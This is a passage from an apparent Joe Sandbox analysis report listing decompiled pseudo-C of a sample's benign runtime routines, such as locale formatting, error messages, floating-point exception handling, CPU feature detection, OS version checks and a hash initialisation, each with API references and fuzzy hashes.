                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                    • GetNumberFormatW.KERNEL32 ref: 00CDAF84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FormatInfoLocaleNumber
                                                    • String ID:
                                                    • API String ID: 2169056816-0
                                                    • Opcode ID: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                    • Instruction ID: f8cca00918f375a7ee0bcde4675e4bca1212bf0ce74e007ee70b73883032f57f
                                                    • Opcode Fuzzy Hash: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                    • Instruction Fuzzy Hash: 8D015E3A100348BAD7109F64EC45FAE77B8EF08750F108422FA05D72A0D7709965CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CC6C74(WCHAR* _a4, long _a8) {
				long _t5;

				_t5 = GetLastError();
				if(_t5 == 0) {
					return 0;
				}
				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
			}




                                                    0x00cc6c74
                                                    0x00cc6c7c
                                                    0x00000000
                                                    0x00cc6ca2
                                                    0x00000000

                                                    APIs
                                                    • GetLastError.KERNEL32(00CC6DDF,00000000,00000400), ref: 00CC6C74
                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CC6C95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                    • Instruction ID: bb15be224b373f85a6c705c2bcc176f67f92f252fcb3f321e88e2a61eff1c9c5
                                                    • Opcode Fuzzy Hash: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                    • Instruction Fuzzy Hash: 72D0C971348300BFFA110B628E06F2E7B99BF45B91F18C409B795E80E1CA789564E62A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CF19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CF19F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00CEF352(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00CEF2B8(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                                    0x00cf1a02
                                                    0x00cf1a09
                                                    0x00cf1a0e
                                                    0x00cf1a14
                                                    0x00cf1a17
                                                    0x00cf1a1d
                                                    0x00cf1a22
                                                    0x00cf1a27
                                                    0x00cf1a27
                                                    0x00cf1a2d
                                                    0x00cf1a32
                                                    0x00cf1a37
                                                    0x00cf1a37
                                                    0x00cf1a3e
                                                    0x00cf1a43
                                                    0x00cf1a48
                                                    0x00cf1a48
                                                    0x00cf1a4f
                                                    0x00cf1a54
                                                    0x00cf1a59
                                                    0x00cf1a59
                                                    0x00cf1a60
                                                    0x00cf1a65
                                                    0x00cf1a6a
                                                    0x00cf1a6a
                                                    0x00cf1a72
                                                    0x00cf1a82
                                                    0x00cf1a94
                                                    0x00cf1aa6
                                                    0x00cf1ab9
                                                    0x00cf1acb
                                                    0x00cf1ad3
                                                    0x00cf1ad8
                                                    0x00cf1add
                                                    0x00cf1add
                                                    0x00cf1ae4
                                                    0x00cf1ae9
                                                    0x00cf1ae9
                                                    0x00cf1af0
                                                    0x00cf1af5
                                                    0x00cf1af5
                                                    0x00cf1afc
                                                    0x00cf1b01
                                                    0x00cf1b01
                                                    0x00cf1b08
                                                    0x00cf1b0d
                                                    0x00cf1b0d
                                                    0x00cf1b17
                                                    0x00cf1b19
                                                    0x00cf1b53
                                                    0x00cf1b1b
                                                    0x00cf1b20
                                                    0x00cf1b44
                                                    0x00cf1b4c
                                                    0x00cf1b40
                                                    0x00cf1b40
                                                    0x00cf1b56
                                                    0x00cf1b5d
                                                    0x00cf1b5f
                                                    0x00cf1b81
                                                    0x00cf1b89
                                                    0x00cf1b8c
                                                    0x00cf1b8c
                                                    0x00cf1b8e
                                                    0x00cf1b8e
                                                    0x00cf1b99
                                                    0x00cf1b9f
                                                    0x00cf1ba4
                                                    0x00cf1bab
                                                    0x00cf1be5
                                                    0x00cf1bf0
                                                    0x00cf1bf6
                                                    0x00cf1bf9
                                                    0x00cf1bfc
                                                    0x00cf1c08
                                                    0x00cf1c10
                                                    0x00cf1bad
                                                    0x00cf1bb0
                                                    0x00cf1bbc
                                                    0x00cf1bc2
                                                    0x00cf1bc8
                                                    0x00cf1bcb
                                                    0x00cf1bd4
                                                    0x00cf1bd4
                                                    0x00cf1c13
                                                    0x00cf1c21
                                                    0x00cf1c27
                                                    0x00cf1c2e
                                                    0x00cf1c30
                                                    0x00cf1c30
                                                    0x00cf1c37
                                                    0x00cf1c39
                                                    0x00cf1c39
                                                    0x00cf1c40
                                                    0x00cf1c42
                                                    0x00cf1c42
                                                    0x00cf1c49
                                                    0x00cf1c4b
                                                    0x00cf1c4b
                                                    0x00cf1c52
                                                    0x00cf1c54
                                                    0x00cf1c54
                                                    0x00cf1c61
                                                    0x00cf1c64
                                                    0x00cf1c9b
                                                    0x00cf1c66
                                                    0x00cf1c66
                                                    0x00cf1c69
                                                    0x00cf1c94
                                                    0x00cf1c89
                                                    0x00cf1c89
                                                    0x00cf1c9d
                                                    0x00cf1ca5
                                                    0x00cf1ca8
                                                    0x00cf1cc7
                                                    0x00cf1ccc
                                                    0x00cf1ccc
                                                    0x00cf1cce
                                                    0x00cf1cd3
                                                    0x00cf1cdf
                                                    0x00cf1cd5
                                                    0x00cf1cd8
                                                    0x00cf1cd8
                                                    0x00cf1ce4
                                                    0x00cf1ce4
                                                    0x00cf1caa
                                                    0x00cf1cad
                                                    0x00cf1cbc
                                                    0x00000000
                                                    0x00cf1cbc
                                                    0x00cf1caf
                                                    0x00cf1cb2
                                                    0x00cf1cb4
                                                    0x00cf1cb4
                                                    0x00000000
                                                    0x00cf1cb2
                                                    0x00cf1c6b
                                                    0x00cf1c6e
                                                    0x00cf1c84
                                                    0x00000000
                                                    0x00cf1c84
                                                    0x00cf1c73
                                                    0x00cf1c75
                                                    0x00cf1c75
                                                    0x00cf1c73
                                                    0x00000000
                                                    0x00cf1c64
                                                    0x00cf1b66
                                                    0x00cf1b74
                                                    0x00cf1b7c
                                                    0x00000000
                                                    0x00cf1b7c
                                                    0x00cf1b6a
                                                    0x00cf1b6f
                                                    0x00cf1b6f
                                                    0x00000000
                                                    0x00cf1b6a
                                                    0x00cf1b27
                                                    0x00cf1b35
                                                    0x00cf1b3d
                                                    0x00000000
                                                    0x00cf1b3d
                                                    0x00cf1b2b
                                                    0x00cf1b30
                                                    0x00cf1b30
                                                    0x00cf1b2b

                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CF19EF,?,?,00000008,?,?,00CF168F,00000000), ref: 00CF1C21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                    • Instruction ID: 2a87a58a3597d47af7608b2016e9adef07123fdc4329ba587f160e8839ab1b72
                                                    • Opcode Fuzzy Hash: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                    • Instruction Fuzzy Hash: 57B16E71210608DFD755CF28C48AB657BE0FF45364F298658EEAACF2A1C335DA92CB41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CDF654(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0xd21d20 =  *0xd21d20 & 0x00000000;
				 *0xcfe7a0 =  *0xcfe7a0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xd21d24;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xd21d24 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xcfe7a0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xd21d20 = 1;
					 *0xcfe7a0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xd21d20 = 2;
						 *0xcfe7a0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xcfe7a0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xd21d20 = 3;
								 *0xcfe7a0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xd21d20 = 5;
									 *0xcfe7a0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xcfe7a0 =  *0xcfe7a0 | 0x00000040;
										 *0xd21d20 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0xd21d24 | 0x00000001;
					 *0xd21d24 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}





























                                                    0x00cdf654
                                                    0x00cdf657
                                                    0x00cdf661
                                                    0x00cdf672
                                                    0x00cdf824
                                                    0x00cdf827
                                                    0x00cdf827
                                                    0x00cdf678
                                                    0x00cdf67e
                                                    0x00cdf683
                                                    0x00cdf687
                                                    0x00cdf68b
                                                    0x00cdf68d
                                                    0x00cdf68f
                                                    0x00cdf692
                                                    0x00cdf697
                                                    0x00cdf6a0
                                                    0x00cdf6b1
                                                    0x00cdf6bc
                                                    0x00cdf6c2
                                                    0x00cdf6c3
                                                    0x00cdf6c9
                                                    0x00cdf6cc
                                                    0x00cdf6d6
                                                    0x00cdf6d9
                                                    0x00cdf6dc
                                                    0x00cdf6df
                                                    0x00cdf724
                                                    0x00cdf724
                                                    0x00cdf72a
                                                    0x00cdf72a
                                                    0x00cdf72f
                                                    0x00cdf730
                                                    0x00cdf736
                                                    0x00cdf768
                                                    0x00cdf738
                                                    0x00cdf73a
                                                    0x00cdf73b
                                                    0x00cdf741
                                                    0x00cdf744
                                                    0x00cdf746
                                                    0x00cdf749
                                                    0x00cdf74c
                                                    0x00cdf74f
                                                    0x00cdf752
                                                    0x00cdf75b
                                                    0x00cdf760
                                                    0x00cdf760
                                                    0x00cdf75b
                                                    0x00cdf76b
                                                    0x00cdf770
                                                    0x00cdf773
                                                    0x00cdf77d
                                                    0x00cdf788
                                                    0x00cdf78e
                                                    0x00cdf791
                                                    0x00cdf79b
                                                    0x00cdf7a6
                                                    0x00cdf7b2
                                                    0x00cdf7b5
                                                    0x00cdf7b8
                                                    0x00cdf7c3
                                                    0x00cdf7c8
                                                    0x00cdf7ca
                                                    0x00cdf7cf
                                                    0x00cdf7d2
                                                    0x00cdf7dc
                                                    0x00cdf7e4
                                                    0x00cdf7e9
                                                    0x00cdf7f3
                                                    0x00cdf801
                                                    0x00cdf814
                                                    0x00cdf81b
                                                    0x00cdf81b
                                                    0x00cdf801
                                                    0x00cdf7e4
                                                    0x00cdf7c8
                                                    0x00cdf7a6
                                                    0x00000000
                                                    0x00cdf823
                                                    0x00cdf6e4
                                                    0x00cdf6ee
                                                    0x00cdf719
                                                    0x00cdf71c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDF66A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    • Opcode ID: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                    • Instruction ID: 83666db047a09911066ac5868eed1ac2a8c2c3cb20f9695ac21a090ecb0cac47
                                                    • Opcode Fuzzy Hash: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                    • Instruction Fuzzy Hash: 16517E71A00619DFDB28CF54E8817AEB7F4FB58314F24852BD512EB3A1D374AA42CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCB146() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xcfe020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xd010a8;
					_t13 =  *0xd010ac;
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xcfe020 = _t12;
					 *0xd010a8 = _t6;
					 *0xd010ac = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                                                    0x00ccb149
                                                    0x00ccb158
                                                    0x00ccb196
                                                    0x00ccb19b
                                                    0x00ccb15a
                                                    0x00ccb160
                                                    0x00ccb16b
                                                    0x00ccb171
                                                    0x00ccb177
                                                    0x00ccb17d
                                                    0x00ccb183
                                                    0x00ccb189
                                                    0x00ccb18e
                                                    0x00ccb18e
                                                    0x00ccb1a4
                                                    0x00ccb1b3
                                                    0x00ccb1a6
                                                    0x00ccb1ac
                                                    0x00ccb1ac

                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                    • Instruction ID: 2361aea24d6c6df7140be6d26e42036374fc59f905605474a7f83d4599c31a12
                                                    • Opcode Fuzzy Hash: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                    • Instruction Fuzzy Hash: 2FF017B9E002188FDB18CB18EC92BE977B2EB88315F544299D519D3390C7B0AE84CE65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00CC40FE() {
				signed int* _t187;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t216;
				signed int _t217;
				signed int _t224;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t239;
				signed int _t240;
				signed int _t245;
				signed int _t246;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				signed int _t286;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int _t299;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t310;
				void* _t311;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				intOrPtr _t329;
				signed int _t331;
				signed int _t332;
				intOrPtr _t335;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				signed int _t344;
				signed int _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr _t349;
				intOrPtr _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				intOrPtr _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;

				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
				_t187 =  *(_t295 + 0xf8);
				_t258 =  *_t187 ^ 0x510e527f;
				_t352 = _t187[1] ^ 0x9b05688c;
				_t266 = 0x10;
				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
				_t363 = _t362 + 0xc;
				_push(8);
				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
				_t364 = _t363 + 0xc;
				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
				_t272 =  *(_t364 + 0x6c);
				_t335 = 0;
				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
				 *(_t364 + 0x38) =  *(_t364 + 0x74);
				 *(_t364 + 0x18) = 0x6a09e667;
				 *(_t364 + 0x24) = 0xbb67ae85;
				 *(_t364 + 0x2c) = 0x3c6ef372;
				 *(_t364 + 0x34) = 0xa54ff53a;
